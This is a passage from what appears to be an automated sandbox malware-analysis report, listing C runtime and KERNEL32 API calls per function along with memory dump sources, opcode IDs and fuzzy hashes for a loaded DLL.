                                                                                                          • SetThreadPriority.KERNEL32(?,?,?), ref: 6FDC839B
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FDC83A7
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FDC83B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@CloseConcurrency@@CreateErrorEventExceptionHandleLastObjectPrioritySingleThreadThrowWaitmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3108201547-0
                                                                                                          • Opcode ID: 4e88fdad8be50a51a8f2efa96ebd073259ae979da1b6a36c8d4dd05c898edf20
                                                                                                          • Instruction ID: 1ed31e1cb377b18d5c0aa6bc18a194bc744cfb2fcf9c26681ea85a2e79111cdc
                                                                                                          • Opcode Fuzzy Hash: 4e88fdad8be50a51a8f2efa96ebd073259ae979da1b6a36c8d4dd05c898edf20
                                                                                                          • Instruction Fuzzy Hash: 02416872508711AFC7409F24C845E9ABBE8FF49724F040A2AF865D76A0EB34F954CB96
                                                                                                          Function 6FD8CD7C Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,?,?,?,6FD93129,?), ref: 6FD8CDC5
                                                                                                          • _read.MSVCR100(00000000,?,?,?,?,6FD93129,?), ref: 6FD8CDCC
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDEF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CDFF
                                                                                                          • _fileno.MSVCR100(?), ref: 6FD8CE10
                                                                                                          • _fileno.MSVCR100(?,?), ref: 6FD8CE20
                                                                                                          • _errno.MSVCR100(?,?,6FD93129,?), ref: 6FDA870C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD93129,?), ref: 6FDA8717
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                                                                                          • String ID:
                                                                                                          • API String ID: 2022966298-0
                                                                                                          • Opcode ID: 4dedb0b4f55da430afe8967e7a0269b9d75530ed0d2e6a2da1ebaa81a2fcf159
                                                                                                          • Instruction ID: 47667dcf03da7f43add5444f13846509752910ab3b8d1119208891997f608975
                                                                                                          • Opcode Fuzzy Hash: 4dedb0b4f55da430afe8967e7a0269b9d75530ed0d2e6a2da1ebaa81a2fcf159
                                                                                                          • Instruction Fuzzy Hash: D431F331458B04DED7A24F7AC800AA67BE4AF03738B108B1AE8F99B5D1D775F141CBA5
                                                                                                          Function 6FD84267 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,6FD84295,?), ref: 6FDA875A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD84295,?), ref: 6FDA8765
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: 1b9e910096df54f2b33475725a215c80366c3ce18722ca7e4dd94f06ae6c6af1
                                                                                                          • Instruction ID: 39f9f45086abaa84ca623aac68db60a7533059a21d4a2ee2c10abb7d1a4ece7a
                                                                                                          • Opcode Fuzzy Hash: 1b9e910096df54f2b33475725a215c80366c3ce18722ca7e4dd94f06ae6c6af1
                                                                                                          • Instruction Fuzzy Hash: 8531C472448B41DAD7E04B39E8007AA77A4BF03738B108A2ED8F98B1D0DB76F141CB94
                                                                                                          Function 6FD96D84 Relevance: 12.1, APIs: 8, Instructions: 100COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DEE
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DF8
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DFF
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96E06
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A6BA: CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB0531
                                                                                                          • __doserrno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB053C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 4219055303-0
                                                                                                          • Opcode ID: 2c917e49ecb245ec7bb4647091c07a4065bdd6c6a0b36c42818435bfe01dd19a
                                                                                                          • Instruction ID: d7036e7fe7b99ea246196b96f23cbdbd45cd6edeaca62a9ff23574ce3b5ce170
                                                                                                          • Opcode Fuzzy Hash: 2c917e49ecb245ec7bb4647091c07a4065bdd6c6a0b36c42818435bfe01dd19a
                                                                                                          • Instruction Fuzzy Hash: 3731E336504745AFDB418F78C984A993BF5EF0B318F15429AE9648F2E2DB71F901CB60
                                                                                                          Function 6FDDE541 Relevance: 12.1, APIs: 8, Instructions: 100COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDE562
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE56C
                                                                                                          • _errno.MSVCR100 ref: 6FDDE583
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE58D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDE5A7
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDE5C5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_invalid_parameter_ismbblead_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 851327168-0
                                                                                                          • Opcode ID: 8acc7e61ed975696b973b0ceaade6472072b7426db661f9e2c237daa829877bc
                                                                                                          • Instruction ID: 09a71894d0c8f53e1bb3210e4ed43940fe120b0cf9ba62bf9ffab2594cc07beb
                                                                                                          • Opcode Fuzzy Hash: 8acc7e61ed975696b973b0ceaade6472072b7426db661f9e2c237daa829877bc
                                                                                                          • Instruction Fuzzy Hash: 6B31F631505396DFEB52AFA8C444B99BBE0AF02768F14459AF0A04F1C1E770F441CBA1
                                                                                                          Function 6FD909EA Relevance: 12.1, APIs: 8, Instructions: 99COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6FD95FBC
                                                                                                          • _errno.MSVCR100 ref: 6FDAC74B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC756
                                                                                                          • _errno.MSVCR100 ref: 6FDAC765
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC770
                                                                                                          • _errno.MSVCR100 ref: 6FDAC77F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC78A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$CompareString__crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 380063240-0
                                                                                                          • Opcode ID: 92f31d898ed74495dbdc95cdabc12c4a18cb5bf2ad594a599a3ba411d492cd8b
                                                                                                          • Instruction ID: 4a817dabbdbc817ba2a7d52e491ab61b102ab0c113b06d118c882ffa739da85b
                                                                                                          • Opcode Fuzzy Hash: 92f31d898ed74495dbdc95cdabc12c4a18cb5bf2ad594a599a3ba411d492cd8b
                                                                                                          • Instruction Fuzzy Hash: E231B176A0035ADBEB905FF8D948BAA36A5AF013B4F105752E4B09F2D0DB35F84097E1
                                                                                                          Function 6FDFA0C5 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD8ACEE: _lock.MSVCR100(0000000B,6FD8AD58,00000018,6FD8AFDD,00000000,?), ref: 6FD8AD15
                                                                                                          • _errno.MSVCR100(6FDFA210,00000018,6FDFA2BF,?,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA105
                                                                                                          • __doserrno.MSVCR100(6FDFA210,00000018,6FDFA2BF,?,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA110
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,6FDFA210,00000018,6FDFA2BF,?,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA132
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA138
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA13F
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA142
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA14C
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,?,?,?,?,?,6FDFA300,00000010), ref: 6FDFA168
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentProcess$DuplicateErrorHandleLast__doserrno_dosmaperr_errno_get_osfhandle_lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 975124184-0
                                                                                                          • Opcode ID: 51324e4190d649fb0987ee54e414e8831121996dfd473fe13ccd3cc831d7b5b3
                                                                                                          • Instruction ID: ce58bf9af0a513a411380e973f3bcc0ae46a58dbd933b225db85bb022472d0bc
                                                                                                          • Opcode Fuzzy Hash: 51324e4190d649fb0987ee54e414e8831121996dfd473fe13ccd3cc831d7b5b3
                                                                                                          • Instruction Fuzzy Hash: 5A31DE369056959FDF418B74C990ADD7BF1AF8A328F1A0285D460AF2D2DB31B906CB60
                                                                                                          Function 6FDD693E Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _mbsrchr.MSVCR100(6FE283F4,0000002E,6FE283F4,00000012), ref: 6FDD6957
                                                                                                            • Part of subcall function 6FDE15E3: _mbsrchr_l.MSVCR100(00000400,6FDCF396,00000000,?,6FDCEF5D,6FDCF396,0000002E,?,?,?,6FDCF396,00000400,?), ref: 6FDE15F0
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FE283F4,00000012), ref: 6FDD696E
                                                                                                          • strtoul.MSVCR100(00000001,00000000,00000020,00000000,6FE283F4,00000012), ref: 6FDD697F
                                                                                                          • _ultoa_s.MSVCR100(?,?,00000008,00000020,00000000,6FE283F4,00000012), ref: 6FDD69A8
                                                                                                          • strcpy_s.MSVCR100(00000001,00000000,?,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD69BF
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD69D0
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD69E7
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD6A02
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_invoke_watson_mbsrchr_mbsrchr_l_ultoa_sstrcpy_sstrtoul
                                                                                                          • String ID:
                                                                                                          • API String ID: 3150214760-0
                                                                                                          • Opcode ID: 1b088bd9336c79b7a1ed4b6e6dd56ce1b24f74acf055e5d519f9a5f2bb4e6749
                                                                                                          • Instruction ID: 12f6cad65099b10fb6a40cde481bd0bd72d5cfb1efc33362fe17b509587de338
                                                                                                          • Opcode Fuzzy Hash: 1b088bd9336c79b7a1ed4b6e6dd56ce1b24f74acf055e5d519f9a5f2bb4e6749
                                                                                                          • Instruction Fuzzy Hash: EA21C971A01308AEE780AFB98C45AAE77B8FF46758F115125F5249B1C0EF70F90587E1
                                                                                                          Function 6FDD860C Relevance: 12.1, APIs: 8, Instructions: 89COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcsrchr.MSVCR100(6FE28448,0000002E,6FE28448,00000012,00000000), ref: 6FDD8626
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FE28448,00000012,00000000), ref: 6FDD8641
                                                                                                          • wcstoul.MSVCR100(00000002,00000000,00000020,6FE28448,00000012,00000000), ref: 6FDD865D
                                                                                                          • _ultow_s.MSVCR100(?,?,00000008,00000020,6FE28448,00000012,00000000), ref: 6FDD8674
                                                                                                          • wcscpy_s.MSVCR100(00000002,00000000,?,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD8688
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD869B
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD86B2
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD86CD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_invoke_watson_ultow_swcscpy_swcsrchrwcstoul
                                                                                                          • String ID:
                                                                                                          • API String ID: 2657208887-0
                                                                                                          • Opcode ID: 0907053518baeef404497f9e3bd0239949dbf2203257a242c38d900fadaf54ee
                                                                                                          • Instruction ID: 78d5496988d3de51399594f049ec577f14ad3c0092348838f6c264d05d2e557a
                                                                                                          • Opcode Fuzzy Hash: 0907053518baeef404497f9e3bd0239949dbf2203257a242c38d900fadaf54ee
                                                                                                          • Instruction Fuzzy Hash: 4F21F971A04304AAEB80AF798C89F9E77A8EF44364F501519F520AB1C1EB70F9018770
                                                                                                          Function 6FD92420 Relevance: 12.1, APIs: 8, Instructions: 86COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcslen.MSVCR100(00000000,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92444
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92455
                                                                                                          • wcslen.MSVCR100(00000000,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92479
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD9248B
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD9249F
                                                                                                          • free.MSVCR100(?,?,00000000,6FDB0861,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD924BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _calloc_crtwcslen$freewcscpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 102582515-0
                                                                                                          • Opcode ID: 790deb0127d6a9e1ed0fd33268707ba523b259720fb0f94812dd272d1d6264d3
                                                                                                          • Instruction ID: be2d674e578f6f3ee24e7b85f2ab53f8c0e9853c3d5cfaef87083b04cd9df7c3
                                                                                                          • Opcode Fuzzy Hash: 790deb0127d6a9e1ed0fd33268707ba523b259720fb0f94812dd272d1d6264d3
                                                                                                          • Instruction Fuzzy Hash: C6210877406B11DADB910B78AC44B663BE8EB5333EF31461BE874970D4EF71B88285A4
                                                                                                          Function 6FD8AA3C Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA51
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA5E
                                                                                                          • _msize.MSVCR100(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA7B
                                                                                                            • Part of subcall function 6FD825DA: HeapSize.KERNEL32(00000000,00000000,?,6FD8AA80,00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?), ref: 6FD825F4
                                                                                                          • EncodePointer.KERNEL32(?,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA97
                                                                                                          • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA9F
                                                                                                          • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD9283A
                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD92850
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 765448609-0
                                                                                                          • Opcode ID: bd905d8d430f0cf85960f7712927660a3e74413a9672ce9da7a1e3cd3582276a
                                                                                                          • Instruction ID: 882ebdad3d62b8874464145ed1537e2495497110b9fe71a0f54ed48ac9365a00
                                                                                                          • Opcode Fuzzy Hash: bd905d8d430f0cf85960f7712927660a3e74413a9672ce9da7a1e3cd3582276a
                                                                                                          • Instruction Fuzzy Hash: C011D37660031AEFDB409FB9DD8088A7BEDFB862A6311063BE401E7150FB71FD158A94
                                                                                                          Function 6FDFA90C Relevance: 12.1, APIs: 8, Instructions: 71filesleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD913A2: _get_osfhandle.MSVCR100(00000000,?,?,6FD8D27B,?,00000000,00000000), ref: 6FD913AC
                                                                                                            • Part of subcall function 6FD913A2: SetFilePointer.KERNEL32(00000000,?,00000000,6FD8D27B,00000000,?,?,6FD8D27B,?,00000000,00000000), ref: 6FD913C5
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,00000000,?,00000000), ref: 6FDFA953
                                                                                                          • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 6FDFA95F
                                                                                                          • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 6FDFA967
                                                                                                          • GetLastError.KERNEL32 ref: 6FDFA971
                                                                                                          • Sleep.KERNEL32(000003E8), ref: 6FDFA987
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDFA9A3
                                                                                                          • _errno.MSVCR100 ref: 6FDFA9AB
                                                                                                          • __doserrno.MSVCR100 ref: 6FDFA9B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$_get_osfhandle$ErrorLastLockPointerSleepUnlock__doserrno_dosmaperr_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 3892553819-0
                                                                                                          • Opcode ID: 387a33c679bef24cc6c659b1b9208225730ec43d42cb7bc1a6f4d523fa5bba77
